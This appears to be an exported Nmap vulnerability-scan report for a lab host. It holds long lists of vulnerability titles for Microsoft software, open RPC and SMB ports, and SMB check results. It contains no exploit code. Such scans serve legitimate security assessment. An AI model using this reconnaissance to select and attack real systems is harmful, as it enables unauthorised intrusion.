[2996] Microsoft IE Object Zone Redirection [2995] Microsoft IE (VictimWindow).document.write Cross Domain Scripting (SaveRef) [2994] Microsoft IE (NewWindow).location.assign Save Reference [2993] Microsoft IE % URL Encoding XSS [2992] Microsoft IE HTML Help ActiveX Control alink and showHelp Overflow [2991] Microsoft WinHlp Active-X Item Parameter Overflow [2990] Microsoft IE IFRAME dialogArguments Object Bypass (BadParent) [2986] Microsoft IE clipboardData Object Caching Cross-domain Policy Bypass [2985] Microsoft IE execCommand Object Caching [2984] Microsoft IE getElementsByTagName Object Caching [2983] Microsoft IE getElementsByName Object Caching [2982] Microsoft IE getElementById Object Caching [2981] Microsoft IE elementFromPoint Object Caching [2980] Microsoft IE createRange Object Caching [2979] Microsoft IE external Object Caching [2978] Microsoft IE showModalDialog Object Caching [2977] Microsoft IE XML Datasource Read Local Files [2976] Microsoft IE CTRL Key onkeydown Remote File Theft [2975] Microsoft IE Back Button XSS [2974] Microsoft IE/Outlook Temporary Internet File Execution [2973] Microsoft IE Third Party Plugin Rendering XSS [2972] Microsoft IE showModalDialog Script Execution [2971] Microsoft WMP File Attachment Script Execution [2970] Microsoft IE cssText Arbitrary File Access [2969] Microsoft VM Bytecode Verifier Execute Arbitrary Code [2968] Microsoft IE File Download Dialog Overflow [2967] Microsoft IE Object Type Property Overflow [2966] Microsoft IE BR549.DLL Overflow [2965] Microsoft IE Cache Script Execution in My Zone [2963] Microsoft IE align HTML Converter Overflow [2952] Microsoft FrontPage Server Extensions (fp30reg.dll) Debug Function Chunked Encoded Request Remote Overflow [2917] Microsoft Access Known Database Attack [2801] Microsoft Word and Excel Execution of Arbitrary Code [2800] Microsoft FrontPage Server Extensions SmartHTML DoS [2784] Microsoft IE Component Function Information Disclosure [2783] Microsoft IE XML Objection Information Disclosure (IredirNrefresh) [2751] Microsoft Word Macro Name Handling Overflow [2745] Microsoft HTML Help Control Privilege Escalation [2707] Microsoft IE Drag and Drop Arbitrary File Installation [2679] Microsoft Outlook Web Access XSS [2674] Microsoft Exchange SMTP Extended Request Overflow [2592] Microsoft PowerPoint Modify Protection Bypass [2572] Microsoft BizTalk Server Insecure Permissions [2544] Microsoft ASP.NET Request Validation Bypass [2510] Microsoft Access Snapshot Viewer Buffer Overflow [2508] Microsoft Visual Basic for Applications Buffer Overflow [2506] Microsoft Word/Works Automated Macro Execution [2453] Microsoft IE My Computer Zone Caching Issue [2451] Microsoft IE Object Data Header Type Safe File Execution [2423] Microsoft MCWNDX.OCX ActiveX Plugin Overflow [2329] Microsoft SQL Server Named Pipe Hijacking Local Privilege Escalation [2320] Microsoft ISA Server HTTP Error Handler XSS [2306] Microsoft FrontPage Server Extensions SmartHTML Interpreter shtml.dll DoS [2299] Microsoft SQL Server Named Pipe Handling Request Remote DoS [2298] Microsoft ISA Server Error Page XSS [2291] Microsoft IE DOM Script Source Recursive DoS [2288] Microsoft Utility Manager Local Privilege Escalation [2283] Microsoft Exchange OWA Execute Arbitrary Code [2239] Microsoft NetMeeting Arbitrary File Write/Execution [2106] Microsoft Media Services ISAPI nsiislog.dll Overflow [2096] Microsoft ISA Server SurfControl Web Filter [2062] CiscoSecure ACS For Windows Format String Overflow [2061] Microsoft Outlook HTML Mail Script Execution [2060] Microsoft IE Known Local File Script Execution [2049] Microsoft Commerce Server ISAPI Long Authentication Overflow [2047] Microsoft IE Content-Type Field Arbitrary File Execution [2046] Microsoft IE Forced Script Execution [2045] Microsoft IE HTML Document Directive Overflow [2043] Microsoft Telnet Server Protocol Option Handling Remote Overflow [2042] Microsoft Exchange System Attendant WinReg Remote Registry Key Manipulation [2041] Microsoft Office for Macintosh Network PID Checker DoS [2010] Microsoft SQL Server C Runtime Functions Format String DoS [2008] Microsoft IE Same Origin Policy Violation [2004] Microsoft IE Cross-frame Remote File Access [1995] Microsoft IE Download Dialog File Extension Spoofing Weakness [1992] Microsoft IE Cookie Disclosure [1982] Microsoft IE about: URI XSS [1978] Microsoft IE for Mac OS Download Execution [1972] Microsoft IE HTTP Request Encoding Spoofing Weakness [1971] Microsoft IE Dotless IP Zone Spoofing Weakness [1968] Microsoft Excel/PowerPoint Macro Security Bypass [1957] Microsoft Exchange OWA Malformed Request DoS [1949] Symantec Norton Anti-Virus for Microsoft Exchange 2000 INBOX Path Information Disclosure [1934] Microsoft ISA Server Invalid URL Error Message XSS [1933] Microsoft ISA Server Proxy Service Memory Leak DoS [1932] Microsoft ISA Server H.323 Memory Leak DoS [1931] Microsoft IIS MIME Content-Type Header DoS [1930] Microsoft IIS SSI ssinc.dll Filename Handling Overflow [1927] Window Maker wmaker Long Windows Title overflow [1902] Microsoft Outlook View ActiveX Arbitrary Command Execution [1867] Microsoft Word Document Macro Execution [1864] Microsoft SQL Server Administrator Cached Connection [1856] Microsoft Exchange OWA Embedded Script Execution [1852] Microsoft Outlook Address Book Spoofing Weakness [1838] Microsoft Word .asd Macro File Execution [1837] Microsoft Word RTF Template Macro Execution [1832] Microsoft IE Spoofed SSL Certificates [1831] Microsoft IE Server Certificate Validation Failure [1826] Microsoft IIS Domain Guest Account Disclosure [1824] Microsoft IIS FTP DoS [1820] Microsoft Index Server Search Parameter Overflow [1819] Windows 2000 Kerberos LSA Memory Leak/DoS [1804] Microsoft IIS Long Request Parsing Remote DoS [1789] Microsoft ISA Server Web Proxy Malformed HTTP Request Parsing Remote DoS [1770] Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS [1750] Microsoft IIS File Fragment Disclosure [1724] Microsoft Web Client Extender NTLM Credential Disclosure [1685] Microsoft IE .lnk/.url Arbitrary Command Execution [1650] Microsoft Exchange Server EUSR_EXSTOREEVENT Default Account [1609] Microsoft NetMeeting Remote Desktop Sharing Malformed String Handling DoS [1606] Microsoft IE Cached Web Credentials Disclosure [1568] CiscoSecure ACS for Windows CSAdmin Login Overflow DoS [1553] Microsoft WebTV annclist.exe Malformed UDP Packet Parsing Remote DoS [1543] Microsoft NT/IIS Invalid URL Request DoS [1537] Microsoft Outlook Rich Text Format Information Disclosure [1530] Microsoft Money Cleartext Password Storage [1510] Microsoft IE Folder.htt Modification Privilege Escalation [1505] Microsoft Word Mail Merge Arbitrary Command Execution [1504] Microsoft IIS File Permission Canonicalization Bypass [1502] Microsoft IE Scriptlet Rendering [1500] Microsoft Word / Excel / Powerpoint 2000 Object Tag Buffer Overflow [1477] Windows NT FTP Server (WFTP) STAT/LIST Command Parsing Remote DoS [1475] Microsoft Outlook/Express Cache Bypass [1467] Microsoft Outlook/Express GMT Field Buffer Overflow [1465] Microsoft IIS .htr Missing Variable DoS [1464] Microsoft IE/Outlook DHTMLED / IFRAME Arbitrary File Access [1461] Microsoft Enterprise Manager DTS Package Password Disclosure [1455] Microsoft Excel REGISTER.ID Function Arbitrary Code Execution [1451] Microsoft SQL Server Stored Procedure Local Permission Restriction Bypass [1428] Microsoft IE/Office ActiveX Object Execution [1427] Microsoft IE VBA Code Execution [1378] Microsoft IE SSL Certificates Validation Failure (v1) [1369] Microsoft SQL Server DTS Password Disclosure [1368] Microsoft Media Encoder Request Parsing Local DoS [1342] Microsoft IE DocumentComplete() Cross Frame Access [1341] Microsoft IE ActiveX Combined Component Attributes [1328] Microsoft Office 2000 UA Control ActiveX (Ouactrl.ocx) Show Me Function Remote Code Execution [1326] Microsoft IE Crafted URL Cross Domain Cookie Disclosure [1325] Microsoft IIS Malformed Filename Request File Fragment Disclosure [1322] Microsoft IIS Malformed .htr Request DoS [1281] Microsoft IIS Escaped Character Saturation Remote DoS [1272] Microsoft Excel XLM Arbitrary Macro Execution [1261] Microsoft IIS Chunked Transfer Encoding Remote Overflow DoS [1250] Microsoft SQL Server Non-Validated Query [1244] Microsoft Clip Art Buffer Overflow [1210] Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access [1209] Microsoft Terminal Server rdisk Registry Information Disclosure [1208] Microsoft East Asian Word Conversion Document Arbitrary Command Execution [1207] Microsoft SMS Remote Control Weak Permission Privilege Escalation [1188] Microsoft CIS IMAP Server Remote Overflow [1170] Microsoft IIS Escape Character URL Access Bypass [1156] Microsoft IE MSDXM.OCX vnd.ms.radio URL Handling Overflow [1152] Microsoft IE Web Proxy Auto-Discovery Unauthorized Proxy Reconfiguration [1145] Microsoft IE Offline Browsing Pack Task Scheduler [1143] Microsoft SQL Server TDS Header NULL Data Handling Remote DoS [1139] Microsoft Rich Text Format (RTF) Reader Malformed Control Word Overflow [1130] Windows NT FTP Server (WFTP) MKD/CWD Nested Command Remote Overflow [1083] Microsoft IIS FTP NO ACCESS Read/Delete File [1082] Microsoft IIS Domain Resolution Access Bypass [1069] Microsoft IE Import/Export Favorites [1056] Microsoft Java Virtual Machine Sandbox Bypass [1054] Microsoft IE scriptlet.typelib ActiveX Arbitrary Command Execution [1052] Microsoft Jet Database Text I-ISAM Arbitrary File Modification [1041] Microsoft IIS Malformed HTTP Request Header DoS [1032] Microsoft FrontPage PWS GET Request Handling Remote DoS [1031] Microsoft Exchange Server Encapsulated SMTP Address Open Relay [1020] Microsoft IIS ISAPI GetExtensionVersion() Privilege Escalation [1019] Microsoft Taskpads Feature Arbitrary Script Injection [956] Windows NT RAS Phonebook Overflow [946] Windows NT KnownDLLs Modification Privilege Escalation [930] Microsoft IIS Shared ASP Cache Information Disclosure [929] Microsoft IIS FTP Server NLST Command Overflow [928] Microsoft IIS Long Request Log Evasion [925] Microsoft Excel 97 CALL Arbitrary Command Execution [922] Microsoft NetMeeting Clipboard Remote Overflow [878] Microsoft SQL Resolution Service Keep-Alive Function DoS [866] Microsoft Remote Data Protocol (RDP) Implementation Cryptographic Information Disclosure [863] Microsoft Exchange Malformed Mail Attribute DoS [852] Microsoft Exchange EHLO Long Hostname Overflow [831] Microsoft Site Server LDAP_Anonymous Account Default Password [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure [815] Microsoft IIS ASP.NET trace.axd Application Tracing Information Disclosure [814] Microsoft IIS global.asa Remote Information Disclosure [782] Microsoft IIS / Site Server codebrws.asp Arbitrary File Access [771] Microsoft IIS Hosting Process (dllhost.exe) Out of Process Application Unspecified Privilege Escalation [768] Microsoft IIS ASP Chunked Encoding Heap Overflow [763] Microsoft IE VBScript Mis-Handling Arbitrary File Access [687] Multiple Vendor FTPD on Windows Floppy Request CPU Consumption DoS [685] Cisco PIX Firewall Manager (PFM) on Windows Web Interface Traversal Arbitrary File Access [636] Microsoft IIS sqlqhit.asp Sample Script CiScope Parameter Information Disclosure [630] Microsoft IIS Multiple Malformed Header Field Internal IP Address Disclosure [626] Microsoft Exchange OWA fumsg.asp Global Address List (GAL) Disclosure [601] Microsoft Exchange Server LDAP Bind Function Overflow [574] OpenWindows winselection Race Condition Privileged Content Disclosure [568] Microsoft IIS idq.dll IDA/IDQ ISAPI Remote Overflow [564] Microsoft IIS ISM.dll Fragmented Source Disclosure [558] Microsoft SQL Server 0x02 Packet Remote Information Disclosure [556] Microsoft IIS/PWS Encoded Filename Arbitrary Command Execution [553] Microsoft Index Server Malformed Search Arbitrary Server-side Include File Access [531] Microsoft SQL Server Registry Key Permission Weakness Privilege Escalation [525] Microsoft IIS Webserver Invalid Filename Request Arbitrary Command Execution [516] Microsoft Point-to-Point Tunneling Protocol (PPTP) Encryption Weakness [482] Microsoft IIS FrontPage Server Extensions (FPSE) Malformed Form DoS [475] Microsoft IIS bdir.htr Arbitrary Directory Listing [474] Microsoft IIS / Site Server viewcode.asp Arbitrary File Access [473] Microsoft IIS Multiple .cnf File Information Disclosure [471] Microsoft IIS ServerVariables_Jscript.asp Path Disclosure [470] Microsoft IIS Form_JScript.asp XSS [463] Microsoft IIS Phone Book Service /pbserver/pbserver.dll Remote Overflow [457] Microsoft Exchange Malformed MIME Header DoS [436] Microsoft IIS Unicode Remote Command Execution [425] Microsoft IIS WebDAV SEARCH Method Arbitrary Directory Forced Listing [414] OpenWindows ttyselection Race Condition Privileged Content Disclosure [396] Microsoft FrontPage shtml.exe MS-DOS Device Name Request DoS [391] Microsoft IIS IDA/IDQ Document Root Path Disclosure [390] Microsoft IIS Translate f: Request ASP Source Disclosure [386] Windows NT FTP Server (WFTP) Unauthenticated MLST Command Remote DoS [384] Windows 2000 Service Control Manager Named Pipe Impersonation [380] MySQL Server on Windows Default Null Root Password [365] Windows NT FTP Server (WFTP) Out of Sequence RNTO Command Remote DoS [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing [308] Microsoft IIS Malformed File Extension URL DoS [307] Microsoft FrontPage 2000 Server Extensions shtml.exe Path Disclosure [285] Microsoft IIS repost.asp File Upload [284] Microsoft IIS IISADMPWD Virtual Directory Information Enumeration [283] Microsoft IIS /iissamples Multiple Sample Scripts Installed [282] Microsoft FrontPage dvwssr.dll Backdoor and Overflow [277] Microsoft IIS / PWS %2e Request ASP Source Disclosure [276] Microsoft IIS ASP::$DATA Stream Request ASP Source Disclosure [275] Microsoft IIS newdsn.exe Remote Arbitrary File Creation [274] Microsoft IIS ctss.idc ODBC Sample Arbitrary Command Execution [273] Microsoft IIS Upgrade ism.dll Local Privilege Escalation [272] Microsoft IIS MDAC RDS Arbitrary Remote Command Execution [271] Microsoft IIS WebHits null.htw .asp Source Disclosure [241] Windows NT FTP Server (WFTP) Unpassworded Guest Account [111] Microsoft Personal Web Server Multiple Dot Request Arbitrary File Access [98] Microsoft IIS perl.exe HTTP Path Disclosure [97] Microsoft IIS ISM.DLL HTR Request Overflow [96] Microsoft IIS idq.dll Traversal Arbitrary File Access [68] Microsoft FrontPage Extensions .pwd File Permissions [67] Microsoft FrontPage Extension shtml.dll Anonymous Account Information Disclosure [7] Microsoft IIS / Site Server showcode.asp source Parameter Traversal Arbitrary File Access [4] Microsoft IIS ExAir advsearch.asp Direct Request Remote DoS [3] Microsoft IIS ExAir query.asp Direct Request Remote DoS [2] Microsoft IIS ExAir search.asp Direct Request DoS
445	tcp	open	microsoft-ds	syn-ack

Host Script Output

Script Name	Output
samba-vuln-cve-2012-1182	Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
smb-vuln-ms10-061	Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
smb-vuln-ms10-054	false

Misc Metrics (click to expand)

192.168.2.14(online)

Address

192.168.2.14 (ipv4)
00:0C:29:ED:BE:D7 - VMware (mac)

Ports

The 997 ports scanned but not shown below are in state: filtered

997 ports replied with: no-response

Port		State (toggle closed [0] \| filtered [0])	Service	Reason	Product	Version	Extra info
135	tcp	open	msrpc	syn-ack	Microsoft Windows RPC
	vulscan	VulDB - https://vuldb.com: [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [88280] Microsoft Windows DCE/RPC information disclosure [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [54547] Microsoft Windows grpconv.exe memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE privilege escalation [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4181] Microsoft Windows RPC Processor privilege escalation [3370] Microsoft Windows RPC Authentication denial of service [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2310] Microsoft Windows 2000 RPC weak authentication [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [900] Microsoft Windows grpconv.exe memory corruption [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [331] Microsoft Windows 2000/XP RPCSS race condition [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 